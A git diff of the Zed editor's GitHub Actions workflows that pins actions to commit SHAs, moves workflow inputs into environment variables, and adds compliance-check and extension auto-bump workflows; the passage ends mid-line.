a/.github/workflows/compare_perf.yml +++ b/.github/workflows/compare_perf.yml @@ -21,7 +21,7 @@ jobs: runs-on: namespace-profile-16x32-ubuntu-2204 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -30,34 +30,45 @@ jobs: cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: compare_perf::run_perf::install_hyperfine - uses: taiki-e/install-action@hyperfine + uses: taiki-e/install-action@b4f2d5cb8597b15997c8ede873eb6185efc5f0ad - name: steps::git_checkout - run: git fetch origin ${{ inputs.base }} && git checkout ${{ inputs.base }} + run: git fetch origin "$REF_NAME" && git checkout "$REF_NAME" + env: + REF_NAME: ${{ inputs.base }} - name: compare_perf::run_perf::cargo_perf_test run: |2- - if [ -n "${{ inputs.crate_name }}" ]; then - cargo perf-test -p ${{ inputs.crate_name }} -- --json=${{ inputs.base }}; + if [ -n "$CRATE_NAME" ]; then + cargo perf-test -p "$CRATE_NAME" -- --json="$REF_NAME"; else - cargo perf-test -p vim -- --json=${{ inputs.base }}; + cargo perf-test -p vim -- --json="$REF_NAME"; fi + env: + REF_NAME: ${{ inputs.base }} + CRATE_NAME: ${{ inputs.crate_name }} - name: steps::git_checkout - run: git fetch origin ${{ inputs.head }} && git checkout ${{ inputs.head }} + run: git fetch origin "$REF_NAME" && git checkout "$REF_NAME" + env: + REF_NAME: ${{ inputs.head }} - name: compare_perf::run_perf::cargo_perf_test run: |2- - if [ -n "${{ inputs.crate_name }}" ]; then - cargo perf-test -p ${{ inputs.crate_name }} -- --json=${{ inputs.head }}; + if [ -n "$CRATE_NAME" ]; then + cargo perf-test -p "$CRATE_NAME" -- --json="$REF_NAME"; else - cargo perf-test -p vim -- --json=${{ inputs.head }}; + cargo perf-test -p 
vim -- --json="$REF_NAME"; fi + env: + REF_NAME: ${{ inputs.head }} + CRATE_NAME: ${{ inputs.crate_name }} - name: compare_perf::run_perf::compare_runs - run: cargo perf-compare --save=results.md ${{ inputs.base }} ${{ inputs.head }} + run: cargo perf-compare --save=results.md "$BASE" "$HEAD" + env: + BASE: ${{ inputs.base }} + HEAD: ${{ inputs.head }} - name: '@actions/upload-artifact results.md' uses: actions/upload-artifact@330a01c490aca151604b8cf639adc76d48f6c5d4 with: diff --git a/.github/workflows/compliance_check.yml b/.github/workflows/compliance_check.yml new file mode 100644 index 0000000000000000000000000000000000000000..f09c460c233b04e78df01e7828b4def737dec16e --- /dev/null +++ b/.github/workflows/compliance_check.yml @@ -0,0 +1,55 @@ +# Generated from xtask::workflows::compliance_check +# Rebuild with `cargo xtask workflows`. +name: compliance_check +env: + CARGO_TERM_COLOR: always +on: + schedule: + - cron: 30 17 * * 2 +jobs: + scheduled_compliance_check: + if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') + runs-on: namespace-profile-2x4-ubuntu-2404 + steps: + - name: steps::checkout_repo + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd + with: + clean: false + fetch-depth: 0 + - name: steps::cache_rust_dependencies_namespace + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 + with: + cache: rust + path: ~/.rustup + - id: determine-version + name: compliance_check::scheduled_compliance_check + run: | + VERSION=$(sed -n 's/^version = "\(.*\)"/\1/p' crates/zed/Cargo.toml | tr -d '[:space:]') + if [ -z "$VERSION" ]; then + echo "Could not determine version from crates/zed/Cargo.toml" + exit 1 + fi + TAG="v${VERSION}-pre" + echo "Checking compliance for $TAG" + echo "tag=$TAG" >> "$GITHUB_OUTPUT" + - id: run-compliance-check + name: compliance_check::scheduled_compliance_check::run_compliance_check + run: cargo xtask compliance "$LATEST_TAG" --branch main 
--report-path target/compliance-report + env: + LATEST_TAG: ${{ steps.determine-version.outputs.tag }} + GITHUB_APP_ID: ${{ secrets.ZED_ZIPPY_APP_ID }} + GITHUB_APP_KEY: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} + - name: compliance_check::scheduled_compliance_check::send_failure_slack_notification + if: failure() + run: | + MESSAGE="⚠️ Scheduled compliance check failed for upcoming preview release $LATEST_TAG: There are PRs with missing reviews." + + curl -X POST -H 'Content-type: application/json' \ + --data "$(jq -n --arg text "$MESSAGE" '{"text": $text}')" \ + "$SLACK_WEBHOOK" + env: + SLACK_WEBHOOK: ${{ secrets.SLACK_WEBHOOK_WORKFLOW_FAILURES }} + LATEST_TAG: ${{ steps.determine-version.outputs.tag }} +defaults: + run: + shell: bash -euxo pipefail {0} diff --git a/.github/workflows/congrats.yml b/.github/workflows/congrats.yml index 6a4111a1c5b5143ee9be067911207d5b4ca1448c..4866b3c33bc6bab9f9d20ac1701b7d6535b356ee 100644 --- a/.github/workflows/congrats.yml +++ b/.github/workflows/congrats.yml @@ -13,7 +13,7 @@ jobs: steps: - name: Get PR info and check if author is external id: check - uses: actions/github-script@v7 + uses: actions/github-script@f28e40c7f34bde8b3046d885e986cb6290c5673b # v7 with: github-token: ${{ secrets.CONGRATSBOT_GITHUB_TOKEN }} script: | @@ -29,6 +29,13 @@ jobs: } const mergedPR = prs.find(pr => pr.merged_at !== null) || prs[0]; + + if (mergedPR.user.type === "Bot") { + // They are a good bot, but not good enough to be congratulated + core.setOutput('should_congratulate', 'false'); + return; + } + const prAuthor = mergedPR.user.login; try { @@ -50,7 +57,7 @@ jobs: congrats: needs: check-author if: needs.check-author.outputs.should_congratulate == 'true' - uses: withastro/automation/.github/workflows/congratsbot.yml@main + uses: withastro/automation/.github/workflows/congratsbot.yml@a5bd0c5748c4d56e687cdd558064f9ee8adfb1f2 # main with: EMOJIS: 🎉,🎊,🧑‍🚀,🥳,🙌,🚀,🦀,🔥,🚢 secrets: diff --git a/.github/workflows/danger.yml 
b/.github/workflows/danger.yml index 62f799baae1fb64a31807030c5700019a3d2c1b7..62739b21675fec2b4289b646fec794846c5fe783 100644 --- a/.github/workflows/danger.yml +++ b/.github/workflows/danger.yml @@ -16,7 +16,7 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_pnpm diff --git a/.github/workflows/deploy_cloudflare.yml b/.github/workflows/deploy_cloudflare.yml index 2650cce1406b16e691565077b95d07730845664b..4e029c63ccd8a022ac9d6107748f964585058735 100644 --- a/.github/workflows/deploy_cloudflare.yml +++ b/.github/workflows/deploy_cloudflare.yml @@ -13,7 +13,7 @@ jobs: steps: - name: Checkout repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 with: clean: false @@ -23,7 +23,10 @@ jobs: - name: Build docs uses: ./.github/actions/build_docs env: + CC: clang + CXX: clang++ DOCS_AMPLITUDE_API_KEY: ${{ secrets.DOCS_AMPLITUDE_API_KEY }} + DOCS_CONSENT_IO_INSTANCE: ${{ secrets.DOCS_CONSENT_IO_INSTANCE }} - name: Deploy Docs uses: cloudflare/wrangler-action@da0e0dfe58b7a431659754fdf3f186c529afbe65 # v3 diff --git a/.github/workflows/deploy_collab.yml b/.github/workflows/deploy_collab.yml index b1bdaf61979452a73380226ce1935b43eb05c32b..5a3eff186814128ebb3973642040d9228f0e87fd 100644 --- a/.github/workflows/deploy_collab.yml +++ b/.github/workflows/deploy_collab.yml @@ -12,9 +12,12 @@ jobs: if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') name: Check formatting and Clippy lints runs-on: namespace-profile-16x32-ubuntu-2204 + env: + CC: clang + CXX: clang++ steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: 
clean: false fetch-depth: 0 @@ -23,14 +26,12 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::cargo_fmt @@ -42,9 +43,12 @@ jobs: - style name: Run tests runs-on: namespace-profile-16x32-ubuntu-2204 + env: + CC: clang + CXX: clang++ steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false fetch-depth: 0 @@ -53,18 +57,16 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::cargo_install_nextest - uses: taiki-e/install-action@nextest + uses: taiki-e/install-action@921e2c9f7148d7ba14cd819f417db338f63e733c - name: steps::clear_target_dir_if_large run: ./script/clear-target-dir-if-larger-than 250 - name: deploy_collab::tests::run_collab_tests @@ -91,7 +93,7 @@ jobs: - name: deploy_collab::publish::sign_into_registry run: doctl registry login - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: deploy_collab::publish::build_docker_image @@ -111,7 +113,7 @@ jobs: runs-on: 
namespace-profile-16x32-ubuntu-2204 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: deploy_collab::deploy::install_doctl @@ -119,8 +121,9 @@ jobs: with: token: ${{ secrets.DIGITALOCEAN_ACCESS_TOKEN }} - name: deploy_collab::deploy::sign_into_kubernetes - run: | - doctl kubernetes cluster kubeconfig save --expiry-seconds 600 ${{ secrets.CLUSTER_NAME }} + run: doctl kubernetes cluster kubeconfig save --expiry-seconds 600 "$CLUSTER_NAME" + env: + CLUSTER_NAME: ${{ secrets.CLUSTER_NAME }} - name: deploy_collab::deploy::start_rollout run: | set -eu @@ -140,7 +143,7 @@ jobs: echo "Deploying collab:$GITHUB_SHA to $ZED_KUBE_NAMESPACE" source script/lib/deploy-helpers.sh - export_vars_for_environment $ZED_KUBE_NAMESPACE + export_vars_for_environment "$ZED_KUBE_NAMESPACE" ZED_DO_CERTIFICATE_ID="$(doctl compute certificate list --format ID --no-header)" export ZED_DO_CERTIFICATE_ID @@ -150,14 +153,14 @@ jobs: export ZED_LOAD_BALANCER_SIZE_UNIT=$ZED_COLLAB_LOAD_BALANCER_SIZE_UNIT export DATABASE_MAX_CONNECTIONS=850 envsubst < crates/collab/k8s/collab.template.yml | kubectl apply -f - - kubectl -n "$ZED_KUBE_NAMESPACE" rollout status deployment/$ZED_SERVICE_NAME --watch + kubectl -n "$ZED_KUBE_NAMESPACE" rollout status "deployment/$ZED_SERVICE_NAME" --watch echo "deployed ${ZED_SERVICE_NAME} to ${ZED_KUBE_NAMESPACE}" export ZED_SERVICE_NAME=api export ZED_LOAD_BALANCER_SIZE_UNIT=$ZED_API_LOAD_BALANCER_SIZE_UNIT export DATABASE_MAX_CONNECTIONS=60 envsubst < crates/collab/k8s/collab.template.yml | kubectl apply -f - - kubectl -n "$ZED_KUBE_NAMESPACE" rollout status deployment/$ZED_SERVICE_NAME --watch + kubectl -n "$ZED_KUBE_NAMESPACE" rollout status "deployment/$ZED_SERVICE_NAME" --watch echo "deployed ${ZED_SERVICE_NAME} to ${ZED_KUBE_NAMESPACE}" defaults: run: diff --git a/.github/workflows/docs_suggestions.yml 
b/.github/workflows/docs_suggestions.yml index c2dc8b4d5197bcbf38dbfb92dac8c23386726d53..c3d04d5780b290c81470dea16d11f473ee7361b1 100644 --- a/.github/workflows/docs_suggestions.yml +++ b/.github/workflows/docs_suggestions.yml @@ -64,7 +64,7 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 with: fetch-depth: 0 token: ${{ secrets.GITHUB_TOKEN }} @@ -296,7 +296,7 @@ jobs: steps: - name: Checkout repository - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 with: fetch-depth: 0 ref: ${{ github.event_name == 'pull_request_target' && github.event.pull_request.base.ref || '' }} diff --git a/.github/workflows/extension_auto_bump.yml b/.github/workflows/extension_auto_bump.yml new file mode 100644 index 0000000000000000000000000000000000000000..e48ccdb082a3620741ad0e79877c505f9b2aa4de --- /dev/null +++ b/.github/workflows/extension_auto_bump.yml @@ -0,0 +1,80 @@ +# Generated from xtask::workflows::extension_auto_bump +# Rebuild with `cargo xtask workflows`. 
+name: extension_auto_bump +on: + push: + branches: + - main + paths: + - extensions/** + - '!extensions/test-extension/**' + - '!extensions/workflows/**' + - '!extensions/*.md' +jobs: + detect_changed_extensions: + if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') + runs-on: namespace-profile-2x4-ubuntu-2404 + steps: + - name: steps::checkout_repo + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd + with: + clean: false + fetch-depth: 2 + - id: detect + name: extension_auto_bump::detect_changed_extensions + run: | + COMPARE_REV="$(git rev-parse HEAD~1)" + CHANGED_FILES="$(git diff --name-only "$COMPARE_REV" "$GITHUB_SHA")" + # Detect changed extension directories (excluding extensions/workflows) + CHANGED_EXTENSIONS=$(echo "$CHANGED_FILES" | grep -oP '^extensions/[^/]+(?=/)' | sort -u | grep -v '^extensions/workflows$' || true) + # Filter out deleted extensions + EXISTING_EXTENSIONS="" + for ext in $CHANGED_EXTENSIONS; do + if [ -f "$ext/extension.toml" ]; then + EXISTING_EXTENSIONS=$(printf '%s\n%s' "$EXISTING_EXTENSIONS" "$ext") + fi + done + CHANGED_EXTENSIONS=$(echo "$EXISTING_EXTENSIONS" | sed '/^$/d') + if [ -n "$CHANGED_EXTENSIONS" ]; then + EXTENSIONS_JSON=$(echo "$CHANGED_EXTENSIONS" | jq -R -s -c 'split("\n") | map(select(length > 0))') + else + EXTENSIONS_JSON="[]" + fi + # Filter out newly added extensions + FILTERED="[]" + for ext in $(echo "$EXTENSIONS_JSON" | jq -r '.[]'); do + if git show HEAD~1:"$ext/extension.toml" >/dev/null 2>&1; then + FILTERED=$(echo "$FILTERED" | jq -c --arg e "$ext" '. 
+ [$e]') + fi + done + echo "changed_extensions=$FILTERED" >> "$GITHUB_OUTPUT" + outputs: + changed_extensions: ${{ steps.detect.outputs.changed_extensions }} + timeout-minutes: 5 + bump_extension_versions: + needs: + - detect_changed_extensions + if: needs.detect_changed_extensions.outputs.changed_extensions != '[]' + permissions: + actions: write + contents: write + issues: write + pull-requests: write + strategy: + matrix: + extension: ${{ fromJson(needs.detect_changed_extensions.outputs.changed_extensions) }} + fail-fast: false + max-parallel: 1 + uses: ./.github/workflows/extension_bump.yml + secrets: + app-id: ${{ secrets.ZED_ZIPPY_APP_ID }} + app-secret: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} + with: + working-directory: ${{ matrix.extension }} + force-bump: false +concurrency: + group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }} + cancel-in-progress: true +defaults: + run: + shell: bash -euxo pipefail {0} diff --git a/.github/workflows/extension_bump.yml b/.github/workflows/extension_bump.yml index b7bb78363ce4ff97680b2a53967938280c3de902..b4cbac4ec8c0ab37ebad73eb96c2ee074ca969a6 100644 --- a/.github/workflows/extension_bump.yml +++ b/.github/workflows/extension_bump.yml @@ -5,7 +5,7 @@ env: CARGO_TERM_COLOR: always RUST_BACKTRACE: '1' CARGO_INCREMENTAL: '0' - ZED_EXTENSION_CLI_SHA: 03d8e9aee95ea6117d75a48bcac2e19241f6e667 + ZED_EXTENSION_CLI_SHA: 1fa7f1a3ec28ea1eae6db2e937d7a538fb10c0c7 on: workflow_call: inputs: @@ -17,6 +17,10 @@ on: description: force-bump required: true type: boolean + working-directory: + description: working-directory + type: string + default: . 
secrets: app-id: description: The app ID used to create the PR @@ -30,7 +34,7 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false fetch-depth: 0 @@ -39,11 +43,9 @@ jobs: run: | CURRENT_VERSION="$(sed -n 's/^version = \"\(.*\)\"/\1/p' < extension.toml | tr -d '[:space:]')" - if [[ "${{ github.event_name }}" == "pull_request" ]]; then + if [[ "$GITHUB_EVENT_NAME" == "pull_request" ]]; then PR_FORK_POINT="$(git merge-base origin/main HEAD)" git checkout "$PR_FORK_POINT" - elif BRANCH_PARENT_SHA="$(git merge-base origin/main origin/zed-zippy-autobump)"; then - git checkout "$BRANCH_PARENT_SHA" else git checkout "$(git log -1 --format=%H)"~1 fi @@ -59,6 +61,10 @@ jobs: version_changed: ${{ steps.compare-versions-check.outputs.version_changed }} current_version: ${{ steps.compare-versions-check.outputs.current_version }} timeout-minutes: 1 + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} bump_extension_version: needs: - check_version_changed @@ -68,22 +74,25 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - id: generate-token - name: extension_bump::generate_token - uses: actions/create-github-app-token@v2 + name: steps::generate_token + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 with: app-id: ${{ secrets.app-id }} private-key: ${{ secrets.app-secret }} - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false + - name: steps::cache_rust_dependencies_namespace + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 + with: + cache: rust + path: ~/.rustup - name: extension_bump::install_bump_2_version run: pip install bump2version 
--break-system-packages - id: bump-version name: extension_bump::bump_version run: | - OLD_VERSION="${{ needs.check_version_changed.outputs.current_version }}" - BUMP_FILES=("extension.toml") if [[ -f "Cargo.toml" ]]; then BUMP_FILES+=("Cargo.toml") @@ -93,29 +102,59 @@ jobs: --search "version = \"{current_version}"\" \ --replace "version = \"{new_version}"\" \ --current-version "$OLD_VERSION" \ - --no-configured-files ${{ inputs.bump-type }} "${BUMP_FILES[@]}" + --no-configured-files "$BUMP_TYPE" "${BUMP_FILES[@]}" if [[ -f "Cargo.toml" ]]; then - cargo update --workspace + cargo +stable update --workspace fi NEW_VERSION="$(sed -n 's/^version = \"\(.*\)\"/\1/p' < extension.toml | tr -d '[:space:]')" + EXTENSION_ID="$(sed -n 's/^id = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')" + EXTENSION_NAME="$(sed -n 's/^name = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')" + + if [[ "$WORKING_DIR" == "." || -z "$WORKING_DIR" ]]; then + { + echo "title=Bump version to ${NEW_VERSION}"; + echo "body=This PR bumps the version of this extension to v${NEW_VERSION}"; + echo "branch_name=zed-zippy-autobump"; + } >> "$GITHUB_OUTPUT" + else + { + echo "title=${EXTENSION_ID}: Bump to v${NEW_VERSION}"; + echo "body<> "$GITHUB_OUTPUT" + fi echo "new_version=${NEW_VERSION}" >> "$GITHUB_OUTPUT" + env: + OLD_VERSION: ${{ needs.check_version_changed.outputs.current_version }} + BUMP_TYPE: ${{ inputs.bump-type }} + WORKING_DIR: ${{ inputs.working-directory }} - name: extension_bump::create_pull_request - uses: peter-evans/create-pull-request@v7 + uses: peter-evans/create-pull-request@98357b18bf14b5342f975ff684046ec3b2a07725 with: - title: Bump version to ${{ steps.bump-version.outputs.new_version }} - body: This PR bumps the version of this extension to v${{ steps.bump-version.outputs.new_version }} - commit-message: Bump version to v${{ steps.bump-version.outputs.new_version }} - branch: zed-zippy-autobump + title: ${{ steps.bump-version.outputs.title }} + 
body: ${{ steps.bump-version.outputs.body }} + commit-message: ${{ steps.bump-version.outputs.title }} + branch: ${{ steps.bump-version.outputs.branch_name }} committer: zed-zippy[bot] <234243425+zed-zippy[bot]@users.noreply.github.com> base: main delete-branch: true token: ${{ steps.generate-token.outputs.token }} sign-commits: true assignees: ${{ github.actor }} - timeout-minutes: 3 + timeout-minutes: 5 + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} create_version_label: needs: - check_version_changed @@ -123,27 +162,48 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - id: generate-token - name: extension_bump::generate_token - uses: actions/create-github-app-token@v2 + name: steps::generate_token + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 with: app-id: ${{ secrets.app-id }} private-key: ${{ secrets.app-secret }} - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false + - id: determine-tag + name: extension_bump::determine_tag + run: | + EXTENSION_ID="$(sed -n 's/^id = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')" + + if [[ "$WORKING_DIR" == "." 
|| -z "$WORKING_DIR" ]]; then + TAG="v${CURRENT_VERSION}" + else + TAG="${EXTENSION_ID}-v${CURRENT_VERSION}" + fi + + echo "tag=${TAG}" >> "$GITHUB_OUTPUT" + env: + CURRENT_VERSION: ${{ needs.check_version_changed.outputs.current_version }} + WORKING_DIR: ${{ inputs.working-directory }} - name: extension_bump::create_version_tag - uses: actions/github-script@v7 + uses: actions/github-script@f28e40c7f34bde8b3046d885e986cb6290c5673b with: script: |- github.rest.git.createRef({ owner: context.repo.owner, repo: context.repo.repo, - ref: 'refs/tags/v${{ needs.check_version_changed.outputs.current_version }}', + ref: 'refs/tags/${{ steps.determine-tag.outputs.tag }}', sha: context.sha }) github-token: ${{ steps.generate-token.outputs.token }} + outputs: + tag: ${{ steps.determine-tag.outputs.tag }} timeout-minutes: 1 + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} trigger_release: needs: - check_version_changed @@ -152,15 +212,15 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - id: generate-token - name: extension_bump::generate_token - uses: actions/create-github-app-token@v2 + name: steps::generate_token + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 with: app-id: ${{ secrets.app-id }} private-key: ${{ secrets.app-secret }} owner: zed-industries repositories: extensions - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - id: get-extension-id @@ -169,16 +229,85 @@ jobs: EXTENSION_ID="$(sed -n 's/id = \"\(.*\)\"/\1/p' < extension.toml)" echo "extension_id=${EXTENSION_ID}" >> "$GITHUB_OUTPUT" - - name: extension_bump::release_action - uses: huacnlee/zed-extension-action@v2 + - id: extension-update + name: extension_bump::release_action + uses: huacnlee/zed-extension-action@82920ff0876879f65ffbcfa3403589114a8919c6 with: extension-name: ${{ 
steps.get-extension-id.outputs.extension_id }} push-to: zed-industries/extensions - tag: v${{ needs.check_version_changed.outputs.current_version }} + tag: ${{ needs.create_version_label.outputs.tag }} env: COMMITTER_TOKEN: ${{ steps.generate-token.outputs.token }} + - name: extension_bump::enable_automerge_if_staff + uses: actions/github-script@f28e40c7f34bde8b3046d885e986cb6290c5673b + with: + github-token: ${{ steps.generate-token.outputs.token }} + script: | + const prNumber = process.env.PR_NUMBER; + if (!prNumber) { + console.log('No pull request number set, skipping automerge.'); + return; + } + + const author = process.env.GITHUB_ACTOR; + let isStaff = false; + try { + const response = await github.rest.teams.getMembershipForUserInOrg({ + org: 'zed-industries', + team_slug: 'staff', + username: author + }); + isStaff = response.data.state === 'active'; + } catch (error) { + if (error.status !== 404) { + throw error; + } + } + + if (!isStaff) { + console.log(`Actor ${author} is not a staff member, skipping automerge.`); + return; + } + + // Assign staff member responsible for the bump + const pullNumber = parseInt(prNumber); + + await github.rest.issues.addAssignees({ + owner: 'zed-industries', + repo: 'extensions', + issue_number: pullNumber, + assignees: [author] + }); + console.log(`Assigned ${author} to PR #${prNumber} in zed-industries/extensions`); + + // Get the GraphQL node ID + const { data: pr } = await github.rest.pulls.get({ + owner: 'zed-industries', + repo: 'extensions', + pull_number: pullNumber + }); + + await github.graphql(` + mutation($pullRequestId: ID!) 
{ + enablePullRequestAutoMerge(input: { pullRequestId: $pullRequestId, mergeMethod: SQUASH }) { + pullRequest { + autoMergeRequest { + enabledAt + } + } + } + } + `, { pullRequestId: pr.node_id }); + + console.log(`Automerge enabled for PR #${prNumber} in zed-industries/extensions`); + env: + PR_NUMBER: ${{ steps.extension-update.outputs.pull-request-number }} + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} concurrency: - group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }} + group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }}extension-bump cancel-in-progress: true defaults: run: diff --git a/.github/workflows/extension_tests.yml b/.github/workflows/extension_tests.yml index ef0e28715ce038c6ca9e38d4126b20e2276ce3c2..622f4c8f1034b4ec0c7625a361ecdb6fb84d9429 100644 --- a/.github/workflows/extension_tests.yml +++ b/.github/workflows/extension_tests.yml @@ -5,18 +5,23 @@ env: CARGO_TERM_COLOR: always RUST_BACKTRACE: '1' CARGO_INCREMENTAL: '0' - ZED_EXTENSION_CLI_SHA: 03d8e9aee95ea6117d75a48bcac2e19241f6e667 + ZED_EXTENSION_CLI_SHA: 1fa7f1a3ec28ea1eae6db2e937d7a538fb10c0c7 RUSTUP_TOOLCHAIN: stable CARGO_BUILD_TARGET: wasm32-wasip2 on: - workflow_call: {} + workflow_call: + inputs: + working-directory: + description: working-directory + type: string + default: . 
jobs: orchestrate: if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false fetch-depth: ${{ github.ref == 'refs/heads/main' && 2 || 350 }} @@ -32,7 +37,15 @@ jobs: git fetch origin "$GITHUB_BASE_REF" --depth=350 COMPARE_REV="$(git merge-base "origin/${GITHUB_BASE_REF}" HEAD)" fi - CHANGED_FILES="$(git diff --name-only "$COMPARE_REV" ${{ github.sha }})" + CHANGED_FILES="$(git diff --name-only "$COMPARE_REV" "$GITHUB_SHA")" + + # When running from a subdirectory, git diff returns repo-root-relative paths. + # Filter to only files within the current working directory and strip the prefix. + REPO_SUBDIR="$(git rev-parse --show-prefix)" + REPO_SUBDIR="${REPO_SUBDIR%/}" + if [ -n "$REPO_SUBDIR" ]; then + CHANGED_FILES="$(echo "$CHANGED_FILES" | grep "^${REPO_SUBDIR}/" | sed "s|^${REPO_SUBDIR}/||" || true)" + fi check_pattern() { local output_name="$1" @@ -49,6 +62,10 @@ jobs: outputs: check_rust: ${{ steps.filter.outputs.check_rust }} check_extension: ${{ steps.filter.outputs.check_extension }} + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} check_rust: needs: - orchestrate @@ -56,27 +73,41 @@ jobs: runs-on: namespace-profile-8x32-ubuntu-2404 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup - name: extension_tests::install_rust_target run: rustup target add wasm32-wasip2 - - name: steps::cargo_fmt - run: 
